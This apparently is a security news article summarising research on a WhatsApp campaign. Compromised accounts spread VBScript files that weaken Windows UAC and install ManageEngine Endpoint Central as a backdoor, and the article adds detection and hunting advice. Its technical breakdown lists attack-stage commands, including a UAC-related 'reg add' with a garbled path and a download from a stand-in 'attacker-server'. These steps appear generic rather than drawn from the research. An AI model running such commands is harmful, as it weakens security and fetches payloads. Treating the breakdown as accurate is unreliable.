Listen to this Post
A Dangerous New WhatsApp Campaign Turns Familiar Messages Into Cyber Traps
Introduction
WhatsApp has long been viewed as one of the safest and most trusted communication platforms in the world. Millions of people rely on it daily to exchange personal conversations, business documents, invoices, financial statements, and confidential information. That trust is exactly what cybercriminals are exploiting in a sophisticated malware campaign that has now spread across multiple continents.
Researchers have uncovered an ongoing attack operation targeting WhatsApp users through compromised accounts. Instead of sending suspicious links or obvious scam messages, attackers distribute files that appear to be legitimate business documents. Because these files arrive from trusted contacts, victims are far more likely to open them without hesitation.
What makes this campaign particularly alarming is its use of legitimate enterprise software to establish remote access. Rather than deploying obvious malware immediately, attackers cleverly install trusted system management tools that allow them to quietly take control of infected devices while avoiding detection.
A Global Campaign With Expanding Reach
According to cybersecurity researchers at Kaspersky, the campaign has already affected users across numerous countries including Brazil, India, Mexico, Singapore, the United Kingdom, Spain, Taiwan, Australia, Russia, Vietnam, and Malaysia.
The geographical diversity of the infections indicates a well-organized operation rather than a localized criminal effort. Attackers appear to be targeting both individuals and businesses, leveraging compromised WhatsApp accounts to spread malicious files through existing contact networks.
The global scale demonstrates how modern cybercriminals can rapidly expand their reach using social platforms that billions of people trust every day.
How the Attack Begins
The infection chain starts with a seemingly harmless message delivered through WhatsApp.
Victims receive a file attachment with names designed to resemble important business documents such as:
Financial reports
Billing statements
Account notifications
Payment records
Business invoices
Corporate documentation
To increase credibility, attackers localize file names into multiple languages. This customization significantly improves the chances that recipients will believe the file is legitimate and open it immediately.
Since the message often arrives from a familiar contact whose account has already been compromised, many users lower their guard and assume the attachment is safe.
Compromised Accounts Fuel the Spread
One of the most concerning aspects of this campaign is the abuse of legitimate WhatsApp accounts.
Researchers observed that attackers gained access to multiple user accounts and used those accounts to distribute malicious files directly to people listed in their contact lists.
This creates a powerful chain reaction. Every compromised account becomes a distribution hub capable of infecting friends, family members, coworkers, clients, and business partners.
Because trust is already established between sender and recipient, traditional social engineering barriers become significantly weaker.
Kaspersky researchers note that the exact technique used to compromise the WhatsApp accounts remains unknown at this time.
The Hidden VBScript Threat
The malicious attachment itself is a heavily obfuscated VBScript file.
VBScript has existed within Windows environments for decades and can execute commands through Windows Script Host. Attackers frequently abuse this capability because scripts can automate malicious actions without requiring sophisticated malware packages.
When the victim opens the file, the script silently contacts attacker-controlled infrastructure and downloads additional payloads required for the next stage of the infection.
The victim often sees little or no indication that malicious activity is occurring in the background.
Bypassing Windows Security Controls
After execution, the downloaded scripts begin modifying system settings.
One of the primary objectives is disabling or weakening User Account Control (UAC), a built-in Windows security mechanism designed to prevent unauthorized administrative actions.
The malware achieves this through Registry modifications that reduce the effectiveness of Windows protections.
By weakening these safeguards, attackers prepare the system for silent installation of additional software without attracting user attention.
Legitimate Software Turned Into an Attack Tool
Perhaps the most fascinating element of the operation is the attackers’ choice of payload.
Instead of deploying a traditional remote access trojan immediately, the campaign downloads and installs ManageEngine Endpoint Central.
ManageEngine Endpoint Central is a legitimate enterprise management platform commonly used by IT departments to manage large numbers of systems from a centralized dashboard.
In normal circumstances, the software serves an important administrative role. However, cybercriminals are repurposing it as a covert remote-access mechanism.
Once installed, the application is configured to communicate with attacker-controlled servers, effectively granting remote administration privileges over the victim’s machine.
The result is a compromised system that appears to be running legitimate software while secretly providing full access to cybercriminals.
WhatsApp Desktop Users Face Additional Risk
Researchers identified an important distinction between WhatsApp Web and the desktop application.
When delivered through WhatsApp Web, users generally need to manually download the VBScript attachment before opening it.
However, within the desktop client, the file can be executed more directly through Windows Script Host (wscript.exe), potentially reducing friction in the attack process.
This subtle difference increases risk for users who regularly exchange documents through the desktop version of WhatsApp.
Possible Links to Known Malware Operations
While researchers stopped short of formally attributing the campaign to a specific threat group, several indicators attracted attention.
Investigators discovered traces suggesting Chinese-language usage within portions of the infrastructure and tooling.
Additionally, some infrastructure overlaps were observed with systems previously associated with ValleyRAT and Gh0st RAT operations.
Despite these findings, the evidence remains insufficient for definitive attribution.
Cybersecurity attribution requires a high degree of confidence, and current data does not conclusively identify the individuals or organization behind the campaign.
Why This Attack Is Especially Effective
Traditional phishing campaigns often fail because recipients recognize suspicious links or poorly written messages.
This campaign succeeds by exploiting three powerful psychological factors:
Trust in personal contacts.
Familiar business-related document names.
Legitimate software used as a malicious tool.
These elements combine to create a highly convincing attack chain that bypasses many users’ instincts for detecting cyber threats.
The use of genuine administration software also helps attackers blend into normal enterprise environments where such tools are commonly deployed.
How Users Can Protect Themselves
The most effective defense begins with skepticism.
Even when a file arrives from a trusted friend, colleague, or family member, users should verify unexpected attachments through a secondary communication channel before opening them.
Additional safety recommendations include:
Maintain updated antivirus protection.
Avoid opening VBS files received through messaging applications.
Keep Windows security features enabled.
Apply operating system updates regularly.
Use endpoint protection capable of detecting suspicious administrative tools.
Enable multi-factor authentication wherever possible.
Monitor systems for unexpected remote management software installations.
Cybercriminals increasingly rely on social trust rather than technical exploits alone, making user awareness a critical layer of defense.
Deep Analysis: Technical Breakdown of the Infection Chain
The attack demonstrates a classic multi-stage intrusion model combined with living-off-the-land techniques.
Stage 1:
wscript.exe malicious_file.vbs
Stage 2:
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies
Stage 3:
Invoke-WebRequest -Uri attacker-server
Stage 4:
EndpointCentral.exe /silent
Stage 5:
Get-Service
Stage 6:
netstat -ano
Stage 7:
Get-Process
From a defensive perspective, organizations should monitor:
Sysmon Event ID 1
Sysmon Event ID 3
Sysmon Event ID 13
Security teams should also hunt for unusual executions of:
wscript.exe
cscript.exe
powershell.exe
reg.exe
mshta.exe
Linux-based threat hunting teams can review suspicious outbound connections using:
netstat -tulpn ss -tulpn lsof -i journalctl -xe
Enterprise defenders should deploy detection rules for:
Endpoint management software installed unexpectedly
Remote management connections to unknown servers
Registry modifications affecting UAC
VBScript execution from messaging applications
The campaign highlights a growing trend where attackers abandon noisy malware in favor of legitimate administrative tools.
This approach significantly reduces detection rates because many security products are configured to trust recognized software vendors.
Another notable characteristic is the use of compromised social identities as distribution mechanisms. Rather than attacking organizations directly, criminals exploit human relationships and communication habits.
The operational model resembles advanced social engineering combined with enterprise-level persistence tactics.
Detection becomes difficult because every stage appears legitimate when viewed individually.
A trusted contact sends a file.
Windows executes a script.
A known software package is installed.
Remote management traffic begins.
Viewed separately, each action may appear harmless.
Viewed together, they reveal a carefully orchestrated compromise.
Security teams should therefore focus on behavioral correlations rather than individual indicators.
Future attacks will likely continue blending legitimate tools, trusted communication channels, and social engineering techniques to evade traditional security controls.
The campaign serves as another reminder that modern cyberattacks increasingly target human trust instead of software vulnerabilities.
What Undercode Say:
The most dangerous aspect of this operation is not the malware itself.
It is the weaponization of trust.
For years, cybersecurity awareness programs focused heavily on suspicious links and malicious email attachments.
Attackers have adapted.
They now understand that people trust messages from friends more than messages from strangers.
WhatsApp has become a valuable attack surface because it combines instant communication with high levels of user confidence.
A message from a colleague is rarely questioned.
A financial report from a known contact appears routine.
That assumption creates the perfect attack opportunity.
The use of VBScript is also noteworthy.
Many organizations focus on PowerShell monitoring while legacy scripting engines receive less scrutiny.
Threat actors frequently exploit these blind spots.
The installation of ManageEngine Endpoint Central reveals another evolution in attacker methodology.
Instead of fighting security products, attackers increasingly work alongside them.
Legitimate software provides camouflage.
Security alerts become less likely.
Incident responders require more time to identify malicious activity.
The campaign further demonstrates how compromised accounts can generate exponential infection growth.
Every successful compromise creates additional trusted distribution points.
The attack therefore scales naturally.
Another significant concern involves attribution.
The presence of Chinese-language indicators and infrastructure overlaps should not automatically lead to conclusions.
Cybercriminals routinely plant false indicators.
Attribution requires extensive evidence beyond language artifacts.
Organizations should focus on defense rather than speculation.
The technical sophistication of the campaign lies not in advanced malware development but in operational design.
Each component serves a strategic purpose.
Social engineering gains execution.
Scripts establish persistence.
Registry modifications reduce resistance.
Legitimate software provides remote access.
Together they create a remarkably efficient intrusion framework.
Future campaigns will likely expand this model.
Messaging applications will increasingly become primary malware delivery channels.
Traditional email security gateways cannot protect users from attacks originating within private messaging ecosystems.
Security awareness training must evolve accordingly.
The lesson is simple.
Trust should never replace verification.
Even the most familiar contact can become an unwitting participant in a cyberattack.
✅ Kaspersky researchers reported a malware campaign spreading through compromised WhatsApp accounts using malicious VBScript attachments.
✅ The attack chain involves downloading additional scripts, modifying Windows settings, and installing ManageEngine Endpoint Central for remote administration access.
✅ Researchers identified infrastructure overlaps with activity previously associated with ValleyRAT and Gh0st RAT, but publicly available evidence remains insufficient for definitive attribution to a specific threat actor.
Prediction
(+1) Messaging platforms will become a primary battleground for malware distribution over the next few years as attackers discover that trust-based delivery dramatically improves infection success rates. 📈
(+1) Endpoint detection vendors will increase monitoring of legitimate administration tools and remote management platforms that are increasingly abused during intrusions. 🛡️
(+1) Organizations will expand security awareness programs beyond email and begin training employees to verify unexpected files received through WhatsApp, Telegram, Signal, and other messaging applications. 🚀
(-1) Threat actors will continue abusing trusted contacts and legitimate software, making future attacks harder to distinguish from normal business activity.
(-1) Traditional antivirus solutions alone may struggle against campaigns that rely heavily on social engineering and legitimate enterprise tools rather than conventional malware signatures.
(-1) Without stronger verification practices, compromised messaging accounts could become one of the fastest-growing initial access vectors for both cybercriminal groups and advanced persistent threat operators. ⚠️
▶️ Related Video (84% Match):
🕵️📝Let’s dive deep and fact‑check.
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
References:
Reported By: www.bleepingcomputer.com
Extra Source Hub (Possible Sources for article):
https://www.instagram.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon | 📺Youtube
